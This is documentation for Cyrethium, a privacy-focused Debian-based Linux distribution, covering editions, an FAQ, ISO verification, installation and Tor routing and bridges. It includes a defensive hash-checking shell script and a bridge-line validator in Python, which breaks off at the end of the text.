Welcome to Cyrethium Wiki

Welcome to the Cyrethium documentation page! This page contains everything you need to know about the Cyrethium operating system.

Cyrethium is a privacy and security-focused Linux distribution. It comes with privacy tools like Tor, I2P, DNSCrypt and is designed to maximize your digital security.

What You'll Find in This Documentation:

  • Legal Disclaimers: Terms of use and legal information
  • Web Site: Cyrethium website
  • About Cyrethium: System architecture and features
  • Installation: System boot and installation guide
  • Usage: Usage manuals
  • Browsers: Information about Cyrethium browsers
  • Settings: System settings
  • Custom Tools: Privacy, security, network, encryption, and crypto tools
  • Security Architecture: Security layers and protection mechanisms
  • Privacy Architecture: Anonymity and privacy mechanisms
  • Info: Linux security info
  • Guides: System guides
  • Developers: Developer sources and technical details about Cyrethium
  • Community: Artstation and community contributions
  • Dev Notes: Developer's notes and suggestions
  • Research: Security research on security and privacy
  • Tricks: Linux and privacy tricks

Click on any topic from the left menu to access detailed information. Happy reading!

Site Map

The Cyrethium website is completely open source and hosted on GitHub. Here's a quick overview of all sections:

Main Pages

  • Homepage: Main page with general information about Cyrethium
  • Download: Download page with ISO links and verification instructions
  • Donate: Support Cyrethium project through donations
  • Docs: Detailed documentation for system usage and information
  • Gallery: System screenshots and visual content
  • News: Development process and community news
  • Releases: Release announcements and version history
  • Developer: Developer information and blog

Documentation Sections

  • Legal Disclaimers: Terms of use, security statement, and legal information
  • About Cyrethium: What is Cyrethium, features, and version comparison
  • Installation: ISO download, USB preparation, boot instructions, and installation guide
  • Usage: Basic usage, Tor routing, system settings, and troubleshooting
  • Security Architecture: System hardening, sysctl, AppArmor, and security measures
  • Privacy Architecture: Tor, I2P, DNSCrypt, and privacy tools
  • Custom Tools: Cyrethium-specific tools and utilities
  • Developers: Tool submission, building ISO, programming guides
  • Research: Security research on exit node attacks, correlation attacks, and P2P networks
  • Community: Artstation and community contributions
  • Dev Notes: Developer's notes and suggestions
  • Tricks: Linux and privacy tricks

Open Source

Cyrethium's website is completely open source and hosted on GitHub. The source code is available for review and contributions.

News Generation

Cyrethium's News section is generated with AI assistance. If you find any errors, please contact us.

Technical Note

If you experience issues with the News and Gallery sections, try temporarily disabling NoScript or similar browser extensions.

Security Statement

Security and privacy are the highest priority in Cyrethium. I am committed to providing a reliable operating system that protects your data, ensures your anonymity, and provides protection against unauthorized access and surveillance.

1. No Data Collection

Cyrethium does NOT COLLECT, STORE, or SEND personal data, telemetry, or usage analytics. Your data remains only on your device and is not shared with third parties or governments.

2. No Backdoors or Hidden Access

There are NO BACKDOORS, HIDDEN CHANNELS, or HIDDEN FUNCTIONS in Cyrethium. The source code is completely open, reviewable, and contains no malicious access points.

3. Only Official Debian Repositories Used

All software packages and updates are obtained only from official Debian repositories. No third-party, custom, or untrusted sources are used, thus maintaining software integrity.

4. Open Source Components

All components, including custom security tools and developments, are completely open source. There are no hidden or proprietary binary files in the system.

5. Traffic Routing is User Controlled

By default, network traffic is not forced to route through the Tor network. Users can enable Tor routing completely at their own discretion. Cyrethium provides secure configuration and tools, but the decision is entirely up to the user.

6. Hardened System Architecture

Cyrethium includes multiple security hardening layers, including:

  • Custom firewall and network filtering rules that block unauthorized traffic
  • Permission and access controls that minimize attack surface
  • Various system hardenings to reduce exploit risks
  • Regular updates in accordance with Debian security bulletins

7. Transparent Development and Code Auditing

Cyrethium's source code, development discussions, and security audits are open to community review. This transparency allows experts from around the world to verify the system.

8. User Responsibility

Cyrethium provides strong security foundations, but ultimate privacy and security depends on user practices.

9. No Warranty

Cyrethium is provided "as is" and no warranty is given. The user accepts all responsibility arising from using the software.

10. Complete Independence and Neutrality

The Cyrethium operating system is not affiliated with any institution, company, or political organization and is developed independently.

Terms of Use

Welcome to Cyrethium Operating System ("Cyrethium"). By downloading, installing, or using Cyrethium, you agree to comply with the following terms:

1. License and Usage

Cyrethium is provided under applicable open source licenses.

You may use Cyrethium only for personal, educational, and research purposes.

Commercial use, redistribution, or modification without explicit permission is prohibited.

2. Prohibited Activities

You agree not to use Cyrethium for the following illegal activities:

  • Hacking, unauthorized access, or malware distribution
  • Engaging in activities that violate local, national, or international laws
  • Attempting to disrupt or damage networks, services, or other users

3. No Warranty

Cyrethium is provided "as is"; the developer root0emir does not guarantee that the software is error-free or completely secure.

4. Limitation of Liability

Developers cannot be held responsible for any damage arising from the use or inability to use Cyrethium.

5. Compliance

It is the user's responsibility to ensure compliance with all applicable laws and regulations when using Cyrethium.

6. Changes to Terms

We reserve the right to make changes to these terms at any time. Your continued use of Cyrethium after changes to the terms means your acceptance.

What is Cyrethium

Cyrethium is a Debian-based Linux distribution focused on privacy and security. It can route all incoming and outgoing internet traffic through the Tor network. DNSCrypt-Proxy and I2P Router are pre-configured. It provides strong protection against browser attacks with custom hardened Firefox variants. The distribution hosts a wide range of tools designed from scratch for Cyrethium and includes multi-layered hardening against cyber attacks. There are 4 different versions available: 2 core and 2 respins.

What Does It Do?

Cyrethium routes all incoming and outgoing network traffic at the system level through the anonymous Tor network operated by volunteers to hide your online activities. The difference from browser-based solutions is clear: here, anonymity applies to the entire system — every application and every connection is forced through Tor; non-Tor exits are rejected.

This way:

  • You leave almost no digital footprint while browsing the internet — as if you were wearing a mask.
  • It provides more comprehensive privacy than standard browser isolation; all your network traffic is protected by anonymous networks.

Security and Hardening

Cyrethium is not just about traffic routing; it provides extra resistance against exploits and malware with multi-layered system hardening. Thanks to a hardened kernel, strict system policies, and settings that reduce the attack surface, it is more resilient compared to ordinary distributions.

Why?

In an era where privacy is important and the internet is far from secure, Cyrethium provides users with both privacy and security.

Who Is It For

For those who need privacy anytime, anywhere, always

Cyrethium is Recommended for:

  • Advanced users who value security and privacy
  • People who already have Linux experience
  • Professionals working in cybersecurity
  • Those interested in crypto and blockchain technology
  • Users working under high threat

Cyrethium Lite is Recommended for:

  • Those who want a secure system in daily use
  • Users with basic Linux knowledge
  • Those looking for a simple but secure solution

Zenrethium is Recommended for:

  • Those looking for a secure but basic Linux distribution
  • Those who want to make their Linux experience more secure and stable

Root0Edition is Recommended for:

  • Complete beginners to Linux but seeking strong privacy
  • Those who want full privacy without dealing with complex tools

Choose Your Edition

Cyrethium focuses on privacy and security as well as threat analysis and system defense. It can monitor and detect network-based attacks as well as system-level attacks, suspicious processes, and suspicious operations. Cyrethium contains many tools and offers a system focused on privacy and security. It requires intermediate to advanced Linux, network, and system knowledge. When used correctly, the privacy and security provided by Cyrethium is strong, but it may be too much for an ordinary user. Cyrethium is a system designed for security researchers, advanced Linux users, cybersecurity experts, and users working under high threat. Cyrethium has many tools, so be prepared for possible bug fix updates.

Cyrethium Lite is a system designed for those who want a secure system in daily use. It is simple to use and contains only basic privacy tools. There are more GUI tools. It can be used with basic Linux knowledge and is ideal for an ordinary user. It is recommended for former Securonis users.

Zenrethium is for those who want a pure Debian experience without any additional tools. It does not contain any additional privacy and security tools. It is a respin that uses Cyrethium's hardening settings and desktop. It is ideal for those who don't want the tools and are looking for a minimal stable system.

Root0Edition is a system built on GNOME Wayland that contains only Tor routing and critical privacy tools. It is designed for complete beginners to Linux who need privacy. With Wayland and minimal tools, the attack surface is low and provides strong security.

Which Version Should I Choose?

I need full privacy and full security, I have Linux and network knowledge. I love tinkering and exploring. I prefer manual usage from the terminal and I'm not afraid of coding. I want to discover new tools: Cyrethium

I need privacy and security but I have basic level knowledge in Linux. I want easy privacy without complexity. A few basic privacy and security tools are enough for me: Cyrethium Lite

Just Tor routing is enough for me, I don't need additional tools. I want basic and strong privacy: Root0Edition

I don't need any tools and privacy. Just a Hardened Debian base is enough for me. I want a secure system for daily use: Zenrethium

Warnings

  • Do not download the Cyrethium ISO from anywhere other than SourceForge. ISOs are not shared in Telegram groups, Darkweb, or other places. The only official download source is SourceForge.
  • Stay away from modified versions. Only download the official Cyrethium Versions.
  • The developer will not message you from anywhere and will not ask you for anything. Beware of imitators.

About Donations

Cyrethium is a project developed entirely independently and on a voluntary basis. The project is not funded by any commercial institution and stands only with the support of the community.

Thanks to donations:

  • Infrastructure costs (domain names, development costs, etc.) are covered.
  • The development process is accelerated and new features are added.
  • The long-term sustainability of the project is ensured.

Privacy Policy

  • All donations are anonymous by default.
  • No donor's personal information is shared with third parties.
  • Donors who wish can only appear in the thank you list in the "News" section with their own consent.

Visibility Options

After donating, you can contact the developer and choose one of the following options:

  • Anonymous Donation → Name or nickname is not visible.
  • Sharing with Nickname → Only the nickname you specify appears in the news section.
  • Sharing with Real Name → Donors who wish can share their name, but this option is not recommended due to privacy sensitivity.

Proof and Communication

If you want your donation to be listed:

  • Provide a screenshot or receipt of the donation transaction.
  • After conveying the relevant proof to the developer, your selected visibility setting is applied.

Transparency

  • The donor list is published only on request.
  • The amount of donations is never shared, only the donor's identity (nickname/name) is visible.
  • This way, transparency is maintained while donors' privacy is also secured.

Nature of Donations

  • All donations are voluntary.
  • No special privileges, features, or access are provided to donors.
  • Cyrethium will always remain free, open, and accessible to everyone.

FAQ

Is Cyrethium free?

Yes. The system is completely free.

Is Cyrethium open source?

Yes. All source codes are open and can be found on GitHub.

Is it suitable for daily use?

Yes, it is designed for daily use.

Can I use it as a live USB?

It can be used live, but it provides more security when installed to disk: AppArmor is not active in live mode, and many kernel hardening and CPU mitigation settings only become active on an installed system. Be aware that a live USB provides less protection.

Can I play games on Cyrethium?

Theoretically, games can be played, but performance will be significantly lower compared to other distributions. Due to CPU mitigation and kernel hardening parameters, the system increases security by compromising performance.

Are supply chain attacks possible on Cyrethium?

Cyrethium uses Debian repositories. Such a situation can only occur if it happens in Debian repositories, but this would affect not only Cyrethium but all Debian-based distributions. Since Cyrethium does not have its own repository, such an attack cannot occur on the Cyrethium side.

Can Cyrethium be exploited?

There is no system that cannot be hacked. However, exploiting Cyrethium would be much more difficult.

Is Cyrethium stronger than Tails and Whonix?

This is a long topic of discussion. Whonix focuses on preventing leaks and hardening. Tails focuses on leaving no traces. Cyrethium focuses on system and network defense. Each specializes in different areas.

Has Cyrethium been audited?

No. It has not been audited so far.

Do I have to use Tor on Cyrethium?

No, Tor routing is completely optional and is disabled by default.

Is Hardened Firefox secure?

It is much more secure than an ordinary browser and contains many hardening and privacy settings.

Hardened Firefox or Amnesic Firefox? Which one should I use?

Hardened Firefox is for daily use, your sessions and history are saved and it is more user-friendly but still quite secure.

Amnesic Firefox has very strict privacy and hardening settings. All your traces are deleted every time it closes. It is more secure and privacy-focused. However, it is less user-friendly in daily use.

How are Cyrethium's tools updated?

They are embedded in the ISO and do not receive updates. Each one is a stable version. If a tool needs an update or a new feature, that change ships with the next ISO version.

Can I use another desktop environment?

Theoretically, of course, but Cyrethium has no customization for other desktops. Also, you need to edit the tool .desktop files from scratch. Although possible, it is a somewhat difficult process.

What does Cyrethium do on shutdown?

It cleans your swap and RAM, deletes kernel caches, deletes your logs and journals, deletes terminal history, deletes temporary files, removes some traces from you, and serves as a defense against coldboot attacks.

How did Cyrethium start?

It started when my Arch-based USB distribution was not accepted in a project competition. Motivated by this, I started developing Cyrethium with determination. My main goal was to get the distribution listed on DistroWatch.

What is Cyrethium's relationship with Securonis?

Cyrethium is the continuation of Securonis. The project name, desktop, and category were changed. Securonis changed its name due to possible copyright risks and SEO problems.

I found a bug, what should I do?

Send an email to the developer: root0emir@protomail.com

I need help, what should I do?

Since Cyrethium is completely Debian-based, look for answers in Debian forums.

If you can't find a solution to your problem, try getting help from an AI assistant such as ChatGPT or DeepSeek.

If you still can't find a solution, you can get help on our Discord server or contact the developer.

How can I follow Cyrethium's development process?

Announcements and news are mostly shared on the website. The project is also active on Discord and LinkedIn.

Who is the development team?

Currently, the project is developed by one person. Cyrethium is completely under the management of Emir (root0emir).

Is Cyrethium easy to use?

It depends on the version you choose. Cyrethium Lite and Root0Edition are easy to use, while the standard Cyrethium version may be more complex.

Are Cyrethium tools developed with AI?

No. AI is only used to analyze the security performance of the website and tools. The tools are still entirely developed by humans.

Do you publish a Warrant Canary?

Yes, it is updated on GitHub every 30-40 days.

About Donations

Information about donations will be added here.

Supporting Cyrethium

If you are using Cyrethium and want to support the project, you can contribute in the following ways:

1. Financial Support

You can contribute to the development process by donating to the project.

Donations help ensure the continuity of the system and help add new features.

2. Design and Art

Graphic designers and visual artists can enrich Cyrethium with wallpapers, icons, or theme designs.

Design contributions can be shared by the community and used in official Cyrethium resources.

3. Software and Tool Development

Developers and programmers can improve existing tools or add new tools.

Code contributions can be submitted via GitHub and reviewed by the community.

Contributions must comply with open source principles.

4. Documentation and Education

Users can write documentation or prepare guides.

Blog posts, guides, and tutorial content help the Cyrethium community learn more easily.

5. Feedback and Bug Reporting

You can report bugs or improvement suggestions you encounter during use.

This way, the system becomes more secure and stable.

6. Content and Promotion

You can promote the project by writing blog posts or sharing Cyrethium reviews and analyses on platforms like Distrowatch.

You can share your experiences, guides, and tutorial content on social media or forums.

These contributions make it easier for new users to learn the system and grow the community.

Developer

Name / Nickname: Emir (root0emir)

Role: Releng

Brief Information:

Cyrethium is an operating system developed independently by Emir.

He previously developed the distribution known as Securonis Linux and now continues his work in the field of privacy, security, and system hardening with Cyrethium.

His goal is to provide a platform where users can work safely and anonymously on the internet.

Areas of Interest:

  • Linux and BSD server and network management
  • Cyber security (generally blue team: network and system security)
  • Artificial intelligence and AI technologies
  • Frontend Web Development and Graphic Design

Programming Languages, Frameworks, and Tool Knowledge:

Advanced Level: Python, Shell, Ansible

Intermediate Level: HTML, CSS, Javascript

Basic Level: C, C#, Go, Java

Pentest and Security Tools: Nessus, Nmap, Burpsuite, Dirbuster, Metasploit, Hydra, John, Snort, Pfsense, Maltego, Beef

Technologies / Frameworks: AppArmor, SELinux, Docker, Kubernetes

Contact:

Email: root0emir@protomail.com

LinkedIn: www.linkedin.com/in/emir837

GitHub: root0emir

Vision and Mission:

  • Develop Cyrethium as an independent, neutral, and secure platform
  • Ensure users keep control in their hands
  • Support security, privacy, and open source community

Don't Make These Mistakes!

If you use it incorrectly, Cyrethium cannot protect you!

Don't use Tor Browser when traffic is routed to Tor

Port conflicts occur, connection stability is disrupted, and it causes Tor over Tor. If you're going to use Tor Browser, disable Cyrethonion. But remember this: while Cyrethonion forces traffic in the system to route through Tor, Tor Browser only routes traffic within the browser.

Hardened/Amnesic Firefox is already secure enough and includes hardening against many attacks.

For the closest experience to Tor Browser, Amnesic Firefox is recommended.

Don't change DNS when traffic is routed to Tor

You should not change DNS while traffic is routed to the Tor network, as this will lead to DNS leaks.

When Cyrethonion starts routing, it backs up your DNS and uses Tor DNS instead. When you stop routing, it restores your DNS.

Don't use another router

Don't use another Tor router together with Cyrethonion. This will cause Tor over Tor and also cause your internet to go down. Use only one router at a time.

Additionally, other routers may not be secure and may be vulnerable to leaks. Use another router only if you are sure you know what you're doing.

Don't add repositories from other distributions

Adding repositories from other distributions will increase the risk of attack and may disrupt system stability.

Cyrethium only uses the Debian repository. Additionally, it uses I2P repositories.

If a supply chain attack occurs in repositories you add from other distributions, your system may be affected.

Cyrethium is not a Plug&Play Distro. Live mode is vulnerable to attacks

Cyrethium is designed to be installed on disk. It can be used amnesically from USB, but the security it provides is much less and it is defenseless against cyber attacks in live mode.

Why?

  • AppArmor is not active in live mode; this is a Debian policy.
  • There is no sudo password, so privilege escalation vulnerabilities can be triggered more easily.
  • Many hardening settings are only activated when the system is installed, because Cyrethium's heavy hardening and CPU mitigation settings cause serious performance degradation in live mode.

If you're looking for a USB Live privacy-focused distribution, Cyrethium may not be for you.

Download & ISO Verification

Downloading Cyrethium ISO

You can download the latest Cyrethium ISO from the official website's Download section. Make sure to always get the ISO from the official source to avoid tampered files.

Note: The ISO file is hosted on SourceForge, a trusted source for our releases.

Verifying SHA256 Checksum

To ensure the integrity of your downloaded ISO, you should verify its SHA256 checksum. Compare the checksum of your downloaded ISO with the official SHA256 provided on the website.

Linux / macOS:

  1. Open a terminal.
  2. Navigate to the folder containing the downloaded ISO, e.g., cd ~/Downloads
  3. Run the SHA256 checksum command:
sha256sum cyrethium-version.iso

Compare the output with the SHA256 checksum listed on the official website. It should match exactly.

Windows:

  1. Open PowerShell.
  2. Navigate to the folder with the ISO: cd C:\Users\YourUsername\Downloads
  3. Run the following command:
Get-FileHash cyrethium-version.iso -Algorithm SHA256

Compare the resulting hash with the SHA256 value provided on the Cyrethium download page.

If the hashes match, the ISO is authentic and safe to use.

If the hashes do not match, do not use the ISO and try downloading again from the official site.
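
As an added example that is not a Cyrethium script, the following shell function automates the comparison step above for Linux and macOS: it normalizes case, refuses a malformed expected value, and fails closed on any mismatch. The script and ISO file names are assumptions.

```shell
#!/bin/sh
# Added example (not a Cyrethium script): verify a downloaded ISO against the
# SHA256 digest published on the official download page, failing closed on
# any mismatch. Works with sha256sum (Linux) or shasum (macOS).
# Usage: sh verify-iso.sh cyrethium-version.iso <published sha256>

verify_iso() {
    iso="$1"
    expected="$2"

    # Refuse to proceed if the file is missing or unreadable.
    [ -r "$iso" ] || { echo "ISO not readable: $iso" >&2; return 2; }

    # Reject anything that is not a 64-character hex digest before comparing,
    # so a truncated or mis-pasted expected value can never "match".
    case "$expected" in
        ""|*[!0-9A-Fa-f]*) echo "expected value is not a hex digest" >&2; return 2 ;;
    esac
    [ "${#expected}" -eq 64 ] || { echo "expected value must be 64 hex characters" >&2; return 2; }

    # Both tools print "<hash>  <file>"; keep only the hash column.
    if command -v sha256sum >/dev/null 2>&1; then
        actual=$(sha256sum "$iso" | awk '{print $1}')
    else
        actual=$(shasum -a 256 "$iso" | awk '{print $1}')
    fi

    # Compare case-insensitively: download pages publish digests in either case.
    actual_lc=$(printf '%s' "$actual" | tr 'A-Z' 'a-z')
    expected_lc=$(printf '%s' "$expected" | tr 'A-Z' 'a-z')
    if [ "$actual_lc" = "$expected_lc" ]; then
        echo "OK: $iso matches the published SHA256"
        return 0
    fi
    echo "MISMATCH: $iso" >&2
    echo "  expected: $expected_lc" >&2
    echo "  actual:   $actual_lc" >&2
    echo "Do not use this ISO; download it again from the official source." >&2
    return 1
}

# Run as a script: exit status 0 only when the digest matches.
if [ "$#" -eq 2 ]; then
    verify_iso "$1" "$2"
fi
```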

USB Preparation

To create a bootable USB for Cyrethium, we highly recommend using Ventoy, as it has been thoroughly tested with Cyrethium releases and works smoothly on both BIOS and UEFI systems.

Requirements:

  • A USB drive of at least 4GB.
  • Note: All data on the USB will be erased during the process. Make sure to back up any important files.

Steps to Prepare the USB with Ventoy

1. Download Ventoy

Get the latest version of Ventoy from the official site: https://www.ventoy.net

2. Install Ventoy on the USB

  • Insert your USB drive.
  • Open Ventoy and select your USB device.
  • Click Install.
  • Warning: This will completely erase all data on the USB.

3. Copy the ISO File

After Ventoy installation is complete, simply copy the Cyrethium ISO file onto the USB drive like a normal file.

You don't need to burn or extract it; Ventoy can boot directly from the ISO.

4. Boot from USB

  • Reboot your computer and select the USB as the boot device.
  • Ventoy will display the ISO(s) you copied. Choose the Cyrethium ISO to boot and install/run.

Tip: Ventoy allows you to keep multiple ISOs on the same USB, making it flexible for testing other systems alongside Cyrethium.

Remember: Always check the SHA256 of the ISO before copying to the USB to ensure authenticity.

Booting Cyrethium from USB

After preparing your USB with Cyrethium (using Ventoy or other tools like Balena Etcher/Rufus), follow these steps to boot your system:

1. Enter BIOS/UEFI

Restart your computer and enter the BIOS/UEFI setup.

Usually accessed by pressing keys like DEL, F2, F10, or ESC during boot (check your motherboard manual).

2. Disable Secure Boot

Locate the Secure Boot option and disable it.

Why? Secure Boot can prevent booting custom OSes like Cyrethium. Disabling it allows the USB to boot correctly.

3. Set USB as First Boot Device

Navigate to the Boot Order / Boot Priority section.

Move your USB drive containing Cyrethium to the top of the boot order.

Save changes and exit the BIOS/UEFI.

4. Boot from USB

On systems using Ventoy:

  • The Ventoy menu will appear, listing all ISO files on your USB.
  • Select the Cyrethium ISO to boot.

On systems using Balena Etcher / Rufus:

  • The system should automatically boot into Cyrethium without additional steps.

5. Enter Cyrethium Boot Screen

When the Cyrethium boot screen appears, press Enter to start.

Wait patiently while Cyrethium loads; this process may take some time depending on your hardware.

Tip: Once booted, you can run Cyrethium live or start the installation process.

Remember: Always ensure your ISO's SHA256 has been verified before booting, to guarantee authenticity and integrity.

Boot Issues & Troubleshooting

If you encounter problems while booting Cyrethium, here are common issues and solutions:

1. Black Screen / Nothing Happens

If you boot Cyrethium and the screen stays black or nothing appears:

Verify ISO Integrity

Make sure the downloaded ISO's SHA256 matches the official value. A corrupted ISO can prevent booting.

Disable Secure Boot

Secure Boot must be disabled in BIOS/UEFI. Unsigned OSes like Cyrethium will not boot if Secure Boot is active.

Be Patient

Cyrethium is a hardened Linux distribution. Depending on your hardware, booting may take longer than usual. Don't panic if it seems stuck; it's normal.

2. NVIDIA / Graphics Issues

Some systems with NVIDIA graphics or other cards may fail to boot:

Use nomodeset

At the boot menu, append the following to the kernel parameters:

nomodeset

This disables kernel mode-setting and often resolves black screen or graphical issues.

Additional Kernel Parameters (Optional)

  • acpi=off or acpi=noirq → fixes some ACPI/IRQ issues.
  • noapic or nolapic → resolves interrupt conflicts.

Check GPU Support

Ensure your GPU is supported by the kernel's open-source driver (Nouveau for NVIDIA).

3. General Notes

  • Cyrethium may not work on very old or very new hardware.
  • If boot fails repeatedly, it's likely hardware compatibility rather than a problem with Cyrethium itself.
  • Cyrethium offers a wide range of firmware and driver support, but Linux hardware compatibility is not perfect. Some devices may not boot or function properly.

Remember: Cyrethium is a hardened, security-focused distribution. Some boot delays or odd behaviors are intentional to maintain integrity and security.

Installation

Installing Cyrethium is simple and user-friendly. Follow these steps:

1. Launch Installer

Once you've booted into the Cyrethium live environment, double-click the "Install Cyrethium" shortcut on the desktop.

2. Follow Calamares Steps

Cyrethium uses the Calamares installer, which provides a guided installation process:

  • Select Language – choose your preferred language.
  • Select Timezone – pick your region and city.
  • Keyboard Layout – select the keyboard layout matching your system.
  • Partitioning – You can choose automatic partitioning (recommended for new users) or manual partitioning for custom layouts.
  • Encrypt Disk (LUKS) – Selecting this option will encrypt your entire disk, protecting your data with a strong password. Make sure to remember this password, as it will be required on every boot.
  • User Account – create your username, password, and optionally enable automatic login.
  • Summary – review your settings before installation.

3. Internet / Network Considerations

If you experience network issues during the installation, consider the following:

  • Temporarily disable Tor routing – If you are using Tor, it can sometimes cause slow or blocked downloads during installation.
  • Change DNS – Change your DNS servers to help resolve network issues or improve download reliability.

4. Start Installation

Click Install to begin.

Wait for the process to complete; this may take several minutes depending on your hardware.

5. Finish Installation

Once finished, reboot your system.

Remove the USB drive when prompted to boot into your new Cyrethium system.

Calamares Common Errors & Solutions

Package Manager Error: Package manager could not make changes on installed system

Usually caused by Secure Boot being enabled.

Solution: Go to BIOS/UEFI and disable Secure Boot, then retry installation.

Package Manager Error 100

Ensure you did not remove any packages in the live system.

Solution: Reboot into live system and start the installation again.

SquashFS Error

May occur if you modified hardening settings or added extra files in the live environment.

Solution: Reboot into the live system and retry installation.

Final Steps

Remove USB Media

Once installation is complete, safely remove your USB drive.

Reboot Your System

Restart your computer to boot into your new Cyrethium installation.

Welcome to Cyrethium

You are now ready to explore your hardened, privacy-focused operating system.

Log in with the username and password you created during installation.

Tip: Always double-check your partitioning, encryption, and network settings before installation to avoid data loss or failed downloads.

Tip: If installation downloads fail repeatedly, try disabling Tor temporarily and/or changing your DNS.

Tip: First boot may take a little longer than usual due to initial setup and security configurations.

Basic Usage

Once you have booted into Cyrethium, here's a quick guide to get started:

1. Applications Menu

Look at the bottom-left corner of the desktop. Click the Applications icon to open the menu.

Inside, navigate to the Cyrethium category to find special privacy and security tools. You can explore and try these tools safely.

2. Tor Routing with Cyrethonion

On the bottom-right corner, click the Tor (onion) icon to open the Cyrethonion tray menu.

Click Start Tor Routing to route your internet traffic through the Tor network, making it anonymous.

Icon Status Indicators:

  • Red with a warning sign – Tor is not active; your traffic is not anonymous.
  • Green – Tor is active; your traffic is anonymous.
  • Grey with a question mark – No internet connection is detected.

For troubleshooting or more detailed information, open the Cyrethonion menu and select Help / Troubleshooting.

3. Updating the System

To update your system:

Go to Applications → System → System Update and click it.

Alternatively, open a terminal and run:

sudo update

This will update your Cyrethium installation to the latest available packages and security updates.

Tip: Regularly updating your system ensures you have the latest security patches and improvements.

Explore the Cyrethium category to familiarize yourself with the built-in privacy and security tools.

Tor Routing

Cyrethonion is a shell-based tool within Cyrethium that forces all internet traffic through the Tor network. It does this by using iptables to redirect all incoming and outgoing traffic to Tor and blocking non-Tor exits, thereby increasing the privacy of your online activities.

Usage — Desktop Panel

Click on the Tor icon on the right side of the desktop panel.

Select the Start Tor Routing option.

Wait a few seconds; all your internet traffic will be routed through the Tor network.

Menu Options:

  • Stop Tor Routing: To stop Tor routing
  • Restart Tor Routing: To restart routing
  • Change IP Address: Restart Tor service to get a new IP (newnym may not always succeed; service restart gives cleaner results)
  • Show IP Address: Check your current IP address
  • Status: Display Tor service and routing status information

If you experience problems, refer to the Cyrethonion documentation.

Developer Notes (Important)

Cyrethonion includes fail-closed configurations that prevent non-Tor traffic leaks — even if the connection suddenly drops, your IP won't leak; non-Tor exits are rejected.

When the internet connection comes and goes, Watchdog automatically restarts routing.

When Start Tor Routing is performed, Cyrethonion's systemd service is also activated; additionally, Cyrethonion will automatically start on boot.

Cyrethonion applies stream isolation: each site or application may see a different IP — this is normal and a result of isolation.

During Tor routing, the newnym signal may sometimes not change the IP; the most reliable method is to restart the Tor service.

Limitations and Warnings

No UDP Support: Tor does not provide UDP support; search, voice chat, and real-time UDP-based applications (e.g., VoIP, game audio) may not work — this is normal.

Ping (ICMP) Blocked: Cyrethonion strictly blocks ICMP traffic to reduce discoverability.

Careless use can cause IP leaks. Avoid the following:

  • Using tools incompatible with Tor routing (or that may leak IP) such as Paranoia, OpenMammoth Firewall
  • Manually modifying iptables rules during routing
  • Running too many network connections/applications in the background

Cyrethonion may feel slower or heavier compared to other simple routers — the reason is strict security rules (ICMP/UDP blocking, spoofing/scan protections, etc.).

Final Notes

Cyrethonion in its current state has a "Tor Guard" warning mechanism; for now, it only warns and does not automatically stop routing. This feature is still under development.

In the future, nftables support may be considered; for now, iptables is used for stability and simplicity.

Tor Bridges

Cyrethonion provides an interface that makes managing Tor bridges easy. Bridges enable connection in networks where Tor access is restricted or censored.

Adding Bridges — Steps

  1. Click the Add Bridges button from the menu
  2. Paste the bridges you copied from https://bridges.torproject.org/ exactly — don't add extra spaces or line breaks
  3. Do not check the "Do you need IPv6 addresses?" box — Cyrethonion currently only supports IPv4. (Also, IPv6 support in Tor is still not stable.)
  4. After adding bridges, restart the router

Supported Bridge Type

Currently, obfs4 proxy is supported (because it is both stable and popular). Other pluggable transports are not currently supported.

After Adding

Cyrethonion detects the bridges you added and automatically writes them to the /etc/tor/torrc file.

When you click the List Bridges button, you will view the bridges you added.

When you press the Clear Bridges button, the added bridges are deleted — don't forget to restart the router after this operation.

Troubleshooting

If your internet connection is cut off after adding a bridge, there may be a problem with the bridges — try getting different bridges and try again.

Make sure you copy the bridges exactly when pasting; don't leave extra spaces at the beginning/end.

If Tor access is completely blocked in your country, some bridges may also be blocked; bridges can quickly go stale and stop working.

Warnings & Tips

Bridges may lose their validity over time — periodically get updated bridges.

Use official Tor Project sources for secure and working bridges.

Since Cyrethonion's bridge management does automatic configuration, use Cyrethonion settings before making manual torrc changes; otherwise, there may be conflicts.
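Before pasting, it helps to check that a bridge line has the shape Cyrethonion accepts. The following is an added example for this page, not Cyrethonion's own code: it validates obfs4 bridge lines (IPv4 endpoint, 40-hex fingerprint, a `cert=` argument), strips the leading and trailing whitespace a sloppy paste adds, rejects IPv6 endpoints and other transports, and renders the matching torrc lines. The sample lines are constructed (TEST-NET addresses, dummy fingerprints and certs) and are not real bridges; the `/usr/bin/obfs4proxy` path is the Debian package location and is an assumption about Cyrethium.

```python
"""Validate obfs4 bridge lines before they are added to torrc.

Added example for this documentation; it is not part of Cyrethonion.
All sample bridge lines below are constructed (TEST-NET addresses,
dummy fingerprints and certs) and are not usable bridges.
"""
import ipaddress
import re

FINGERPRINT_RE = re.compile(r"^[0-9A-Fa-f]{40}$")
# obfs4 certs are base64 without padding; real ones are 70 characters long.
CERT_RE = re.compile(r"^[A-Za-z0-9+/]{60,80}$")
OBFS4PROXY = "/usr/bin/obfs4proxy"   # Debian package path; assumption about Cyrethium


class BridgeError(ValueError):
    """A line Cyrethonion would not accept, with the reason as the message."""


def parse_obfs4_bridge(line):
    """Parse one bridge line (BridgeDB form or torrc 'Bridge ...' form).

    Leading/trailing whitespace is stripped because that is the usual paste
    error; the transport must be obfs4 and the endpoint must be an IPv4
    address, matching the restrictions described above.
    """
    fields = line.strip().split()
    if fields and fields[0].lower() == "bridge":
        fields = fields[1:]
    if len(fields) < 3:
        raise BridgeError("expected: obfs4 IP:PORT FINGERPRINT cert=... iat-mode=N")
    if fields[0] != "obfs4":
        raise BridgeError(f"transport {fields[0]!r} is not supported; only obfs4 is")
    endpoint, fingerprint, *args = fields[1:]
    host, sep, port = endpoint.rpartition(":")
    if not sep or not port.isdigit() or not 1 <= int(port) <= 65535:
        raise BridgeError("endpoint must be IP:PORT")
    try:
        addr = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        raise BridgeError("endpoint must be an IP address, not a hostname")
    if addr.version != 4:
        raise BridgeError("IPv6 bridges are not supported; request IPv4 bridges")
    if not FINGERPRINT_RE.match(fingerprint):
        raise BridgeError("fingerprint must be 40 hexadecimal characters")
    kv = dict(a.split("=", 1) for a in args if "=" in a)
    if not CERT_RE.match(kv.get("cert", "")):
        raise BridgeError("obfs4 lines need a cert=... argument")
    if kv.get("iat-mode", "0") not in ("0", "1", "2"):
        raise BridgeError("iat-mode must be 0, 1 or 2")
    return {"ip": str(addr), "port": int(port), "fingerprint": fingerprint.upper(),
            "cert": kv["cert"], "iat_mode": int(kv.get("iat-mode", "0"))}


def check_lines(lines):
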